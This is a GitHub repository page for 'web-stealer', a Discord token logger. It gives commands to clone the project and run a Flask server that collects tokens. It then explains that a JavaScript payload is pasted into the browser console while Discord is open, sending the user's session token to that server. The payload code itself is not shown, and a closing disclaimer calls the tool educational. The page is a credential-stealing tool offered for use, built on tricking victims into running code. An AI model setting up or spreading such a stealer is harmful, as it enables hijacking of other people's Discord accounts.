Skip to content

javascript discord token logger (web)

Notifications You must be signed in to change notification settings

baum1810/web-stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Web-Stealer Setup Guide

Platforms

This tool is compatible with Windows, macOS, Linux, and any other operating systems that support Python and Flask.

Setup Instructions

  1. Clone the Repository:

    git clone https://github.com/osintcats/web-stealer.git
    
  2. Navigate to the Project Directory:

    cd web-stealer
    
  3. Install Required Python Packages: Ensure you have Python and pip installed. Create a requirements.txt file with the required dependencies and install them:

    pip install -r requirements.txt
    
  4. Run the Flask Application:

    python api.py
    

Payload JavaScript Snippet

To send the token to your server, use the following JavaScript snippet. Replace 'PASTE_URL_HERE' with the URL of your Flask application. Copy the generated payload and paste it into the browser console while Discord is open. The token will be sent to your server.

Credz

fixes by baum1810

Disclaimer

This program is intended solely for educational purposes to highlight potential security vulnerabilities. Do not use this program for unauthorized access or token grabbing. The creator assumes no responsibility for any damage or misuse resulting from the use of this software.